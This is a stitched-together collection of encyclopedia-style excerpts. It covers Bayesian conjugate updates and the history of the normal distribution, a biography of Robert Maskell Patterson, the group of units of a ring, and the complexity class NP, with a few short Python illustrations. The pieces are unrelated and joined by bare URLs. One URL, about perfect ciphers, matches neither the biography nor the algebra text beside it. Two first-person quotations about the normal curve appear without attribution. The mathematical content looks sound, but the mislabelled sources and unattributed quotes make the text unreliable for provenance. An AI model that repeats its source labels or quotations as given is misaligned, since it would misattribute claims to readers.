$$\begin{aligned}\nu _{0}'&=\nu _{0}+n\\{\sigma _{0}^{2}}'&={\frac {\nu _{0}\sigma _{0}^{2}+\sum _{i=1}^{n}(x_{i}-\mu )^{2}}{\nu _{0}+n}}\end{aligned}$$

Reparameterizing in terms of an inverse gamma distribution, the result is:

$$\begin{aligned}\alpha '&=\alpha +{\frac {n}{2}}\\\beta '&=\beta +{\frac {\sum _{i=1}^{n}(x_{i}-\mu )^{2}}{2}}\end{aligned}$$

For a set of i.i.d. normally distributed data points $\mathbf{X}$ of size $n$ where each individual point $x$ follows $x\sim {\mathcal {N}}(\mu ,\sigma ^{2})$ with unknown mean $\mu$ and unknown variance $\sigma^{2}$, a combined (multivariate) conjugate prior is placed over the mean and variance, consisting of a normal-inverse-gamma distribution. Logically, this originates from conditioning the mean on the variance: a normal prior is placed on the mean given the variance, and a scaled inverse chi-squared (equivalently, inverse gamma) prior is placed on the variance itself.

The priors are normally defined as follows:

$$\begin{aligned}p(\mu \mid \sigma ^{2};\mu _{0},n_{0})&\sim {\mathcal {N}}(\mu _{0},\sigma ^{2}/n_{0})\\p(\sigma ^{2};\nu _{0},\sigma _{0}^{2})&\sim I\chi ^{2}(\nu _{0},\sigma _{0}^{2})=IG(\nu _{0}/2,\nu _{0}\sigma _{0}^{2}/2)\end{aligned}$$

The update equations can be derived, and look as follows:

$$\begin{aligned}{\bar {x}}&={\frac {1}{n}}\sum _{i=1}^{n}x_{i}\\\mu _{0}'&={\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}}\\n_{0}'&=n_{0}+n\\\nu _{0}'&=\nu _{0}+n\\\nu _{0}'{\sigma _{0}^{2}}'&=\nu _{0}\sigma _{0}^{2}+\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}\end{aligned}$$

The updated numbers of pseudo-observations are obtained by adding the corresponding number of actual observations to them. The new mean hyperparameter is once again a weighted average, this time weighted by the relative numbers of observations. Finally, the update for $\nu _{0}'{\sigma _{0}^{2}}'$ is similar to the case with known mean, but in this case the sum of squared deviations is taken with respect to the observed data mean rather than the true mean, and as a result a new interaction term needs to be added to take care of the additional error source stemming from the deviation between prior and data mean.
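As an illustration, the update equations for the unknown-mean, unknown-variance case can be written as a small function. This is a sketch only; the function name and example data are assumptions, not from the source:

```python
# Normal / scaled inverse chi-squared conjugate update for unknown mean and variance,
# following the update equations above.
def update_normal_inverse_chi2(data, mu0, n0, nu0, sigma0_sq):
    n = len(data)
    xbar = sum(data) / n
    ss = sum((x - xbar) ** 2 for x in data)           # sum of squared deviations
    mu0_post = (n0 * mu0 + n * xbar) / (n0 + n)       # weighted average of the means
    n0_post = n0 + n                                  # pseudo-observations for the mean
    nu0_post = nu0 + n                                # pseudo-observations for the variance
    sigma0_sq_post = (nu0 * sigma0_sq + ss
                      + (n0 * n) / (n0 + n) * (mu0 - xbar) ** 2) / nu0_post
    return mu0_post, n0_post, nu0_post, sigma0_sq_post

data = [4.8, 5.1, 5.3, 4.9, 5.2, 5.0]
print(update_normal_inverse_chi2(data, mu0=0.0, n0=1.0, nu0=1.0, sigma0_sq=1.0))
```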
The prior distributions are

$$\begin{aligned}p(\mu \mid \sigma ^{2};\mu _{0},n_{0})&\sim {\mathcal {N}}(\mu _{0},\sigma ^{2}/n_{0})={\frac {1}{\sqrt {2\pi {\frac {\sigma ^{2}}{n_{0}}}}}}\exp \left(-{\frac {n_{0}}{2\sigma ^{2}}}(\mu -\mu _{0})^{2}\right)\\&\propto (\sigma ^{2})^{-1/2}\exp \left(-{\frac {n_{0}}{2\sigma ^{2}}}(\mu -\mu _{0})^{2}\right)\\p(\sigma ^{2};\nu _{0},\sigma _{0}^{2})&\sim I\chi ^{2}(\nu _{0},\sigma _{0}^{2})=IG(\nu _{0}/2,\nu _{0}\sigma _{0}^{2}/2)\\&={\frac {(\sigma _{0}^{2}\nu _{0}/2)^{\nu _{0}/2}}{\Gamma (\nu _{0}/2)}}~{\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+\nu _{0}/2}}}\\&\propto (\sigma ^{2})^{-(1+\nu _{0}/2)}\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right].\end{aligned}$$

Therefore, the joint prior is

$$\begin{aligned}p(\mu ,\sigma ^{2};\mu _{0},n_{0},\nu _{0},\sigma _{0}^{2})&=p(\mu \mid \sigma ^{2};\mu _{0},n_{0})\,p(\sigma ^{2};\nu _{0},\sigma _{0}^{2})\\&\propto (\sigma ^{2})^{-(\nu _{0}+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+n_{0}(\mu -\mu _{0})^{2}\right)\right].\end{aligned}$$

The likelihood function from the section above with known variance is:

$$p(\mathbf {X} \mid \mu ,\sigma ^{2})=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\sum _{i=1}^{n}(x_{i}-\mu )^{2}\right)\right]$$

Writing it in terms of variance rather than precision, we get:

$$\begin{aligned}p(\mathbf {X} \mid \mu ,\sigma ^{2})&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)\right]\\&\propto (\sigma ^{2})^{-n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(S+n({\bar {x}}-\mu )^{2}\right)\right]\end{aligned}$$

where $S=\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}$.

Therefore, the posterior is (dropping the hyperparameters as conditioning factors):

$$\begin{aligned}p(\mu ,\sigma ^{2}\mid \mathbf {X} )&\propto p(\mu ,\sigma ^{2})\,p(\mathbf {X} \mid \mu ,\sigma ^{2})\\&\propto (\sigma ^{2})^{-(\nu _{0}+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+n_{0}(\mu -\mu _{0})^{2}\right)\right](\sigma ^{2})^{-n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(S+n({\bar {x}}-\mu )^{2}\right)\right]\\&=(\sigma ^{2})^{-(\nu _{0}+n+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+S+n_{0}(\mu -\mu _{0})^{2}+n({\bar {x}}-\mu )^{2}\right)\right]\\&=(\sigma ^{2})^{-(\nu _{0}+n+3)/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+S+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}+(n_{0}+n)\left(\mu -{\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}}\right)^{2}\right)\right]\\&\propto (\sigma ^{2})^{-1/2}\exp \left[-{\frac {n_{0}+n}{2\sigma ^{2}}}\left(\mu -{\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}}\right)^{2}\right]\\&\quad \times (\sigma ^{2})^{-(\nu _{0}/2+n/2+1)}\exp \left[-{\frac {1}{2\sigma ^{2}}}\left(\nu _{0}\sigma _{0}^{2}+S+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}\right)\right]\\&={\mathcal {N}}_{\mu \mid \sigma ^{2}}\left({\frac {n_{0}\mu _{0}+n{\bar {x}}}{n_{0}+n}},{\frac {\sigma ^{2}}{n_{0}+n}}\right)\cdot {\rm {IG}}_{\sigma ^{2}}\left({\frac {1}{2}}(\nu _{0}+n),{\frac {1}{2}}\left(\nu _{0}\sigma _{0}^{2}+S+{\frac {n_{0}n}{n_{0}+n}}(\mu _{0}-{\bar {x}})^{2}\right)\right).\end{aligned}$$

In other words, the posterior distribution has the form of a product of a normal distribution over $p(\mu \mid \sigma ^{2})$ times an inverse gamma distribution over $p(\sigma ^{2})$, with parameters that are the same as the update equations above.

The occurrence of the normal distribution in practical problems can be loosely classified into four categories: exactly normal distributions; approximately normal laws, for example when such an approximation is justified by the central limit theorem; distributions modeled as normal; and regression problems, where the normal distribution appears after systematic effects have been modeled sufficiently well.

Certain quantities in physics are distributed normally, as was first demonstrated by James Clerk Maxwell. Examples of such quantities include the velocity components of the molecules in an ideal gas and the position of a particle that experiences diffusion.

Approximately normal distributions occur in many situations, as explained by the central limit theorem. When the outcome is produced by many small effects acting additively and independently, its distribution will be close to normal. The normal approximation will not be valid if the effects act multiplicatively (instead of additively), or if there is a single external influence that has a considerably larger magnitude than the rest of the effects.

I can only recognize the occurrence of the normal curve – the Laplacian curve of errors – as a very abnormal phenomenon. It is roughly approximated to in certain distributions; for this reason, and on account of its beautiful simplicity, we may, perhaps, use it as a first approximation, particularly in theoretical investigations.

There are statistical methods to empirically test that assumption; see the above Normality tests section.

John Ioannidis argued that using normally distributed standard deviations as standards for validating research findings leaves falsifiable predictions about phenomena that are not normally distributed untested. This includes, for example, phenomena that appear only when all necessary conditions are present and one condition cannot substitute for another in an addition-like way, as well as phenomena that are not randomly distributed. Ioannidis argues that standard-deviation-centered validation gives a false appearance of validity to hypotheses and theories where some but not all falsifiable predictions are normally distributed, since the falsifiable predictions for which there is contrary evidence may, in some cases, lie in the non-normally distributed parts of the range of falsifiable predictions, while such validation baselessly dismisses hypotheses for which none of the falsifiable predictions are normally distributed as if they were unfalsifiable, when in fact they do make falsifiable predictions.
It is argued by Ioannidis that many cases of mutually exclusive theories being accepted as validated by research journals are caused by the journals' failure to take into account empirical falsifications of non-normally distributed predictions, and not because the mutually exclusive theories are true, which they cannot be, although two mutually exclusive theories can both be wrong and a third one correct.[58]

In computer simulations, especially in applications of the Monte-Carlo method, it is often desirable to generate values that are normally distributed. The algorithms used for this purpose all generate standard normal deviates, since a $\mathcal {N}(\mu ,\sigma ^{2})$ variate can be generated as $X=\mu +\sigma Z$, where $Z$ is standard normal. All these algorithms rely on the availability of a random number generator $U$ capable of producing uniform random variates.

The standard normal cumulative distribution function is widely used in scientific and statistical computing. The values $\Phi (x)$ may be approximated very accurately by a variety of methods, such as numerical integration, Taylor series, asymptotic series and continued fractions. Different approximations are used depending on the desired level of accuracy. For negative arguments, one can use the symmetry $1-\Phi (x)=\Phi (-x)$.

Shore (1982) introduced simple approximations that may be incorporated in stochastic optimization models of engineering and operations research, like reliability engineering and inventory analysis. Denoting $p=\Phi (z)$, the simplest approximation for the quantile function is:

$$z=\Phi ^{-1}(p)=5.5556\left[1-\left({\frac {1-p}{p}}\right)^{0.1186}\right],\qquad p\geq 1/2$$

This approximation delivers for $z$ a maximum absolute error of 0.026 (for $0.5\leq p\leq 0.9999$, corresponding to $0\leq z\leq 3.719$). For $p<1/2$, replace $p$ by $1-p$ and change the sign. Another approximation, somewhat less accurate, is the single-parameter approximation:

$$z=-0.4115\left\{{\frac {1-p}{p}}+\log \left[{\frac {1-p}{p}}\right]-1\right\},\qquad p\geq 1/2$$

The latter had served to derive a simple approximation for the loss integral of the normal distribution, defined by

$$\begin{aligned}L(z)&=\int _{z}^{\infty }(u-z)\varphi (u)\,du=\int _{z}^{\infty }[1-\Phi (u)]\,du\\L(z)&\approx {\begin{cases}0.4115\left({\dfrac {p}{1-p}}\right)-z,&p<1/2,\\0.4115\left({\dfrac {1-p}{p}}\right),&p\geq 1/2,\end{cases}}\end{aligned}$$

or, equivalently,

$$L(z)\approx {\begin{cases}0.4115\left\{1-\log \left[{\frac {p}{1-p}}\right]\right\},&p<1/2,\\0.4115\,{\dfrac {1-p}{p}},&p\geq 1/2.\end{cases}}$$

This approximation is particularly accurate for the right far tail (maximum error of $10^{-3}$ for $z\geq 1.4$). Highly accurate approximations for the cumulative distribution function, based on Response Modeling Methodology (RMM, Shore, 2011, 2012), are shown in Shore (2005). Some more approximations can be found at: Error function#Approximation with elementary functions. In particular, a small relative error on the whole domain for the cumulative distribution function $\Phi$, and for the quantile function $\Phi ^{-1}$ as well, is achieved via an explicitly invertible formula by Sergei Winitzki in 2008.
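As a quick check of the error bound quoted above, Shore's simplest quantile approximation can be compared against the standard library's inverse CDF. The grid of p values and the helper name below are illustrative assumptions:

```python
# Compare Shore's (1982) simple quantile approximation to an accurate inverse CDF.
from statistics import NormalDist

def shore_quantile(p):
    # z = Phi^{-1}(p) ~ 5.5556 * [1 - ((1-p)/p)^0.1186], valid for p >= 1/2
    return 5.5556 * (1.0 - ((1.0 - p) / p) ** 0.1186)

nd = NormalDist()  # standard normal
ps = [0.5 + i * (0.9999 - 0.5) / 2000 for i in range(2001)]
max_err = max(abs(shore_quantile(p) - nd.inv_cdf(p)) for p in ps)
print(f"maximum absolute error over the grid: {max_err:.4f}")  # close to the 0.026 quoted above
```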
Some authors[68][69] attribute the discovery of the normal distribution to de Moivre, who in 1738[note 2] published in the second edition of his The Doctrine of Chances the study of the coefficients in the binomial expansion of $(a+b)^{n}$. De Moivre proved that the middle term in this expansion has the approximate magnitude of $2^{n}/{\sqrt {2\pi n}}$, and that "If $m$ or $\tfrac{1}{2}n$ be a Quantity infinitely great, then the Logarithm of the Ratio, which a Term distant from the middle by the Interval $\ell$, has to the middle Term, is $-{\frac {2\ell \ell }{n}}$."[70] Although this theorem can be interpreted as the first obscure expression for the normal probability law, Stigler points out that de Moivre himself did not interpret his results as anything more than the approximate rule for the binomial coefficients, and in particular de Moivre lacked the concept of the probability density function.[71]

In 1809 Gauss published his monograph "Theoria motus corporum coelestium in sectionibus conicis solem ambientium", where among other things he introduces several important statistical concepts, such as the method of least squares, the method of maximum likelihood, and the normal distribution. Gauss used $M,M',M'',\ldots$ to denote the measurements of some unknown quantity $V$, and sought the most probable estimator of that quantity: the one that maximizes the probability $\varphi (M-V)\cdot \varphi (M'-V)\cdot \varphi (M''-V)\cdots$ of obtaining the observed experimental results. In his notation, $\varphi \Delta$ is the probability density function of the measurement errors of magnitude $\Delta$. Not knowing what the function $\varphi$ is, Gauss requires that his method should reduce to the well-known answer: the arithmetic mean of the measured values.[note 3] Starting from these principles, Gauss demonstrates that the only law that rationalizes the choice of arithmetic mean as an estimator of the location parameter is the normal law of errors:[72]

$$\varphi \Delta ={\frac {h}{\sqrt {\pi }}}\,e^{-h^{2}\Delta ^{2}},$$

where $h$ is "the measure of the precision of the observations". Using this normal law as a generic model for errors in the experiments, Gauss formulates what is now known as the non-linear weighted least squares method.[73]

Although Gauss was the first to suggest the normal distribution law, Laplace made significant contributions.[note 4] It was Laplace who first posed the problem of aggregating several observations in 1774,[74] although his own solution led to the Laplacian distribution.
It was Laplace who first calculated the value of the integral $\int e^{-t^{2}}\,dt={\sqrt {\pi }}$ in 1782, providing the normalization constant for the normal distribution.[75] For this accomplishment, Gauss acknowledged the priority of Laplace.[76] Finally, it was Laplace who in 1810 proved and presented to the academy the fundamental central limit theorem, which emphasized the theoretical importance of the normal distribution.[77]

It is of interest to note that in 1809 an Irish-American mathematician, Robert Adrain, published two insightful but flawed derivations of the normal probability law, simultaneously and independently from Gauss.[78] His works remained largely unnoticed by the scientific community, until in 1871 they were exhumed by Abbe.[79]

In the middle of the 19th century Maxwell demonstrated that the normal distribution is not just a convenient mathematical tool, but may also occur in natural phenomena:[80] the number of particles whose velocity, resolved in a certain direction, lies between $x$ and $x+dx$ is

$$\operatorname {N} \,{\frac {1}{\alpha \,{\sqrt {\pi }}}}\;e^{-{\frac {x^{2}}{\alpha ^{2}}}}\,dx$$

Today, the concept is usually known in English as the normal distribution or Gaussian distribution. Other less common names include Gauss distribution, Laplace–Gauss distribution, the law of error, the law of facility of errors, Laplace's second law, and Gaussian law.

Gauss himself apparently coined the term with reference to the "normal equations" involved in its applications, with normal having its technical meaning of orthogonal rather than usual.[81] However, by the end of the 19th century some authors[note 5] had started using the name normal distribution, where the word "normal" was used as an adjective – the term now being seen as a reflection of the fact that this distribution was seen as typical, common – and thus normal. Peirce (one of those authors) once defined "normal" thus: "...the 'normal' is not the average (or any other kind of mean) of what actually occurs, but of what would, in the long run, occur under certain circumstances."[82] Around the turn of the 20th century Pearson popularized the term normal as a designation for this distribution.[83]

Many years ago I called the Laplace–Gaussian curve the normal curve, which name, while it avoids an international question of priority, has the disadvantage of leading people to believe that all other distributions of frequency are in one sense or another 'abnormal'.

Also, it was Pearson who first wrote the distribution in terms of the standard deviation $\sigma$ as in modern notation. Soon after this, in 1915, Fisher added the location parameter to the formula for the normal distribution, expressing it in the way it is written nowadays:

$$df={\frac {1}{\sqrt {2\sigma ^{2}\pi }}}e^{-(x-m)^{2}/(2\sigma ^{2})}\,dx.$$

The term "standard normal", which denotes the normal distribution with zero mean and unit variance, came into general use around the 1950s, appearing in the popular textbooks by P. G. Hoel (1947) Introduction to Mathematical Statistics and A. M. Mood (1950) Introduction to the Theory of Statistics.[84]
https://en.wikipedia.org/wiki/Normal_distribution
Robert Maskell Patterson (March 23, 1787 – September 5, 1854) was an American professor of mathematics, chemistry and natural philosophy at the University of Pennsylvania from 1812 to 1828 and professor of natural philosophy at the University of Virginia from 1828 to 1835. He served as the 6th director of the United States Mint from 1835 to 1851 and was a member of the American Philosophical Society from 1809 until his death in 1854, serving as its president from 1849.[1][2]

Patterson was born on March 23, 1787, in Philadelphia,[3] one of eight children of Robert Patterson and Amy Hunter Ewing.[4] Patterson attended the University of Pennsylvania and graduated in 1804 with a B.A. He studied medicine under Benjamin Smith Barton[5] and graduated with an M.D. in 1808.[6] He continued his education in Paris, France, at the Jardin des Plantes, and studied with René Just Haüy,[7] Louis Nicolas Vauquelin, Adrien-Marie Legendre and Siméon Denis Poisson.[8] In 1811, Patterson travelled to England and studied with Humphry Davy.[7]

He returned to the United States in 1812 and was appointed professor of natural philosophy, chemistry and mathematics in the department of medicine at the University of Pennsylvania. He was appointed vice provost in 1814.[7] Patterson remained at Penn until 1828, when he joined the faculty of the University of Virginia. He was elected an Associate Fellow of the American Academy of Arts and Sciences in 1834.[9] Patterson was nominated as director of the U.S. Mint by President Andrew Jackson[10][11] and served from 1835 to 1851.[12] In 1807, Patterson and his father were consulted by Ferdinand Rudolph Hassler for guidance on the United States Coast and Geodetic Survey. In 1826, Patterson was consulted by the governor of Pennsylvania to determine the best source of water for a state canal.[8]

He was active in the Franklin Institute, the Musical Fund Society of Philadelphia and the Pennsylvania Institution for the Instruction of the Blind.[6]

Patterson died on September 5, 1854, in Philadelphia,[13] and was interred at Laurel Hill Cemetery.[14] He was married to Helen Hamilton Leiper, daughter of Thomas Leiper, on April 20, 1814,[15] and together they had six children.[8]

Patterson was the youngest person elected to the American Philosophical Society, at 22, in 1809. He served as its secretary in 1813, as vice-president in 1825, and as president in 1849.[13]
https://en.wikipedia.org/wiki/Perfect_cipher
In algebra, a unit or invertible element[a] of a ring is an invertible element for the multiplication of the ring. That is, an element $u$ of a ring $R$ is a unit if there exists $v$ in $R$ such that $vu=uv=1$, where $1$ is the multiplicative identity; the element $v$ is unique for this property and is called the multiplicative inverse of $u$.[1][2] The set of units of $R$ forms a group $R^{\times }$ under multiplication, called the group of units or unit group of $R$.[b] Other notations for the unit group are $R^{*}$, $U(R)$, and $E(R)$ (from the German term Einheit).

Less commonly, the term unit is sometimes used to refer to the element $1$ of the ring, in expressions like ring with a unit or unit ring, and also unit matrix. Because of this ambiguity, $1$ is more commonly called the "unity" or the "identity" of the ring, and the phrases "ring with unity" or a "ring with identity" may be used to emphasize that one is considering a ring instead of a rng.

The multiplicative identity $1$ and its additive inverse $-1$ are always units. More generally, any root of unity in a ring $R$ is a unit: if $r^{n}=1$, then $r^{n-1}$ is a multiplicative inverse of $r$. In a nonzero ring, the element 0 is not a unit, so $R^{\times }$ is not closed under addition. A nonzero ring $R$ in which every nonzero element is a unit (that is, $R^{\times }=R\setminus \{0\}$) is called a division ring (or a skew-field). A commutative division ring is called a field. For example, the unit group of the field of real numbers $\mathbf {R}$ is $\mathbf {R} \setminus \{0\}$.

In the ring of integers $\mathbf {Z}$, the only units are $1$ and $-1$. In the ring $\mathbf {Z} /n\mathbf {Z}$ of integers modulo $n$, the units are the congruence classes $\pmod {n}$ represented by integers coprime to $n$. They constitute the multiplicative group of integers modulo $n$.

In the ring $\mathbf {Z} [{\sqrt {3}}]$ obtained by adjoining the quadratic integer ${\sqrt {3}}$ to $\mathbf {Z}$, one has $(2+{\sqrt {3}})(2-{\sqrt {3}})=1$, so $2+{\sqrt {3}}$ is a unit, and so are its powers, so $\mathbf {Z} [{\sqrt {3}}]$ has infinitely many units.

More generally, for the ring of integers $R$ in a number field $F$, Dirichlet's unit theorem states that $R^{\times }$ is isomorphic to the group $\mathbf {Z} ^{n}\times \mu _{R}$, where $\mu _{R}$ is the (finite, cyclic) group of roots of unity in $R$ and $n$, the rank of the unit group, is $n=r_{1}+r_{2}-1$, where $r_{1},r_{2}$ are the number of real embeddings and the number of pairs of complex embeddings of $F$, respectively. This recovers the $\mathbf {Z} [{\sqrt {3}}]$ example: the unit group of (the ring of integers of) a real quadratic field is infinite of rank 1, since $r_{1}=2,r_{2}=0$.

For a commutative ring $R$, the units of the polynomial ring $R[x]$ are the polynomials $p(x)=a_{0}+a_{1}x+\dots +a_{n}x^{n}$ such that $a_{0}$ is a unit in $R$ and the remaining coefficients $a_{1},\dots ,a_{n}$ are nilpotent, i.e., satisfy $a_{i}^{N}=0$ for some $N$.[4] In particular, if $R$ is a domain (or more generally reduced), then the units of $R[x]$ are the units of $R$. The units of the power series ring $R[[x]]$ are the power series $p(x)=\sum _{i=0}^{\infty }a_{i}x^{i}$ such that $a_{0}$ is a unit in $R$.[5]

The unit group of the ring $M_{n}(R)$ of $n\times n$ matrices over a ring $R$ is the group $\operatorname {GL} _{n}(R)$ of invertible matrices. For a commutative ring $R$, an element $A$ of $M_{n}(R)$ is invertible if and only if the determinant of $A$ is invertible in $R$. In that case, $A^{-1}$ can be given explicitly in terms of the adjugate matrix.
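As a concrete illustration of the statement above that the units of Z/nZ are the congruence classes of integers coprime to n, the following sketch (illustrative only; a brute-force search, not an efficient method) lists the unit group of Z/12Z together with the inverse of each unit:

```python
# Units of Z/nZ found by brute force, with their multiplicative inverses.
from math import gcd

def unit_group(n):
    units = {}
    for a in range(1, n):
        for b in range(1, n):
            if (a * b) % n == 1:
                units[a] = b          # b is the inverse of a modulo n
                break
    return units

units_mod_12 = unit_group(12)
print(sorted(units_mod_12))                         # [1, 5, 7, 11]
print(all(gcd(a, 12) == 1 for a in units_mod_12))   # True: exactly the classes coprime to 12
```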
For elements $x$ and $y$ in a ring $R$, if $1-xy$ is invertible, then $1-yx$ is invertible with inverse $1+y(1-xy)^{-1}x$;[6] this formula can be guessed, but not proved, by the following calculation in a ring of noncommutative power series:

$$(1-yx)^{-1}=\sum _{n\geq 0}(yx)^{n}=1+y\left(\sum _{n\geq 0}(xy)^{n}\right)x=1+y(1-xy)^{-1}x.$$

See Hua's identity for similar results.

A commutative ring is a local ring if $R\setminus R^{\times }$ is a maximal ideal. As it turns out, if $R\setminus R^{\times }$ is an ideal, then it is necessarily a maximal ideal and $R$ is local, since a maximal ideal is disjoint from $R^{\times }$.

If $R$ is a finite field, then $R^{\times }$ is a cyclic group of order $|R|-1$.

Every ring homomorphism $f:R\to S$ induces a group homomorphism $R^{\times }\to S^{\times }$, since $f$ maps units to units. In fact, the formation of the unit group defines a functor from the category of rings to the category of groups. This functor has a left adjoint, which is the integral group ring construction.[7]

The group scheme $\operatorname {GL} _{1}$ is isomorphic to the multiplicative group scheme $\mathbb {G} _{m}$ over any base, so for any commutative ring $R$, the groups $\operatorname {GL} _{1}(R)$ and $\mathbb {G} _{m}(R)$ are canonically isomorphic to $U(R)$. Note that the functor $\mathbb {G} _{m}$ (that is, $R\mapsto U(R)$) is representable in the following sense: $\mathbb {G} _{m}(R)\simeq \operatorname {Hom} (\mathbb {Z} [t,t^{-1}],R)$ for commutative rings $R$ (this for instance follows from the aforementioned adjoint relation with the group ring construction). Explicitly this means that there is a natural bijection between the set of the ring homomorphisms $\mathbb {Z} [t,t^{-1}]\to R$ and the set of unit elements of $R$ (in contrast, $\mathbb {Z} [t]$ represents the additive group scheme $\mathbb {G} _{a}$, that is, the forgetful functor from the category of commutative rings to the category of abelian groups).

Suppose that $R$ is commutative. Elements $r$ and $s$ of $R$ are called associate if there exists a unit $u$ in $R$ such that $r=us$; then write $r\sim s$. In any ring, pairs of additive inverse elements[c] $x$ and $-x$ are associate, since any ring includes the unit $-1$. For example, 6 and −6 are associate in $\mathbf {Z}$. In general, $\sim$ is an equivalence relation on $R$.

Associatedness can also be described in terms of the action of $R^{\times }$ on $R$ via multiplication: two elements of $R$ are associate if they are in the same $R^{\times }$-orbit.

In an integral domain, the set of associates of a given nonzero element has the same cardinality as $R^{\times }$.

The equivalence relation $\sim$ can be viewed as any one of Green's semigroup relations specialized to the multiplicative semigroup of a commutative ring $R$.
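Returning to the inverse formula 1 + y(1 − xy)⁻¹x for 1 − yx stated at the start of this passage, a quick numerical check in a matrix ring is easy to run. The sketch below uses numpy with random matrices and assumes that 1 − xy happens to be invertible (which is almost always the case for random real matrices):

```python
import numpy as np

rng = np.random.default_rng(0)
n = 4
X = rng.normal(size=(n, n))
Y = rng.normal(size=(n, n))
I = np.eye(n)

inv_one_minus_xy = np.linalg.inv(I - X @ Y)      # assumes I - XY is invertible
candidate = I + Y @ inv_one_minus_xy @ X         # claimed inverse of I - YX
print(np.allclose((I - Y @ X) @ candidate, I))   # True
print(np.allclose(candidate @ (I - Y @ X), I))   # True
```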
https://en.wikipedia.org/wiki/Group_of_units#Example:_The_group_of_units_of_Z_n
In computational complexity theory, NP (nondeterministic polynomial time) is a complexity class used to classify decision problems. NP is the set of decision problems for which the problem instances, where the answer is "yes", have proofs verifiable in polynomial time by a deterministic Turing machine, or alternatively the set of problems that can be solved in polynomial time by a nondeterministic Turing machine.[2][Note 1]

The first definition is the basis for the abbreviation NP: "nondeterministic, polynomial time". These two definitions are equivalent because the algorithm based on the Turing machine consists of two phases, the first of which consists of a guess about the solution, which is generated in a nondeterministic way, while the second phase consists of a deterministic algorithm that verifies whether the guess is a solution to the problem.[3]

The complexity class P (all problems solvable, deterministically, in polynomial time) is contained in NP (problems where solutions can be verified in polynomial time), because if a problem is solvable in polynomial time, then a solution is also verifiable in polynomial time by simply solving the problem. It is widely believed, but not proven, that P is smaller than NP; in other words, that decision problems exist that cannot be solved in polynomial time even though their solutions can be checked in polynomial time. The hardest problems in NP are called NP-complete problems. An algorithm solving such a problem in polynomial time is also able to solve any other NP problem in polynomial time. If P were in fact equal to NP, then a polynomial-time algorithm would exist for solving NP-complete problems, and by corollary, all NP problems.[4]

The complexity class NP is related to the complexity class co-NP, for which the answer "no" can be verified in polynomial time. Whether or not NP = co-NP is another outstanding question in complexity theory.[5]

The complexity class NP can be defined in terms of NTIME as $\mathsf{NP}=\bigcup _{k\in \mathbb {N} }\mathsf{NTIME}(n^{k})$, where $\mathsf{NTIME}(n^{k})$ is the set of decision problems that can be solved by a nondeterministic Turing machine in $O(n^{k})$ time.

Equivalently, NP can be defined using deterministic Turing machines as verifiers. A language $L$ is in NP if and only if there exist polynomials $p$ and $q$, and a deterministic Turing machine $M$, such that for every $x$ in $L$ there exists a certificate string $y$ of length at most $q(|x|)$ for which $M(x,y)$ accepts within $p(|x|)$ steps, and for every $x$ not in $L$ no certificate string of that length makes $M(x,y)$ accept.

Many computer science problems are contained in NP, like decision versions of many search and optimization problems.

In order to explain the verifier-based definition of NP, consider the subset sum problem: assume that we are given some integers, {−7, −3, −2, 5, 8}, and we wish to know whether some of these integers sum up to zero. Here the answer is "yes", since the integers {−3, −2, 5} correspond to the sum (−3) + (−2) + 5 = 0. To answer whether some of the integers add to zero we can create an algorithm that obtains all the possible subsets. As the number of integers that we feed into the algorithm becomes larger, both the number of subsets and the computation time grow exponentially. But notice that if we are given a particular subset, we can efficiently verify whether the subset sum is zero, by summing the integers of the subset. If the sum is zero, that subset is a proof or witness that the answer is "yes". An algorithm that verifies whether a given subset has sum zero is a verifier. Clearly, summing the integers of a subset can be done in polynomial time, and the subset sum problem is therefore in NP. The above example can be generalized for any decision problem.
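To make the verifier idea concrete, here is a small sketch (not from the source; the names are illustrative). The certificate is a proposed subset, and the verifier checks in polynomial time that it is non-empty, drawn from the instance, and sums to zero:

```python
# Polynomial-time verifier for the subset sum example.
from collections import Counter

def verify_subset_sum(instance, certificate):
    """Return True iff `certificate` proves a 'yes' answer for `instance`."""
    if not certificate:
        return False
    available = Counter(instance)
    chosen = Counter(certificate)
    if any(chosen[v] > available[v] for v in chosen):
        return False                     # certificate uses numbers not in the instance
    return sum(certificate) == 0         # the actual subset-sum check

instance = [-7, -3, -2, 5, 8]
print(verify_subset_sum(instance, [-3, -2, 5]))   # True: a valid witness
print(verify_subset_sum(instance, [-7, 8]))       # False: sums to 1
```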
More generally, given any instance I of problem $\Pi$ and witness W, if there exists a verifier V such that, given the ordered pair (I, W) as input, V returns "yes" in polynomial time whenever the witness proves that the answer is "yes", and returns "no" in polynomial time otherwise, then $\Pi$ is in NP.

The "no"-answer version of this problem is stated as: "given a finite set of integers, does every non-empty subset have a nonzero sum?". The verifier-based definition of NP does not require an efficient verifier for the "no"-answers. The class of problems with such verifiers for the "no"-answers is called co-NP. In fact, it is an open question whether all problems in NP also have verifiers for the "no"-answers and thus are in co-NP. In some literature the verifier is called the "certifier", and the witness the "certificate".[2]

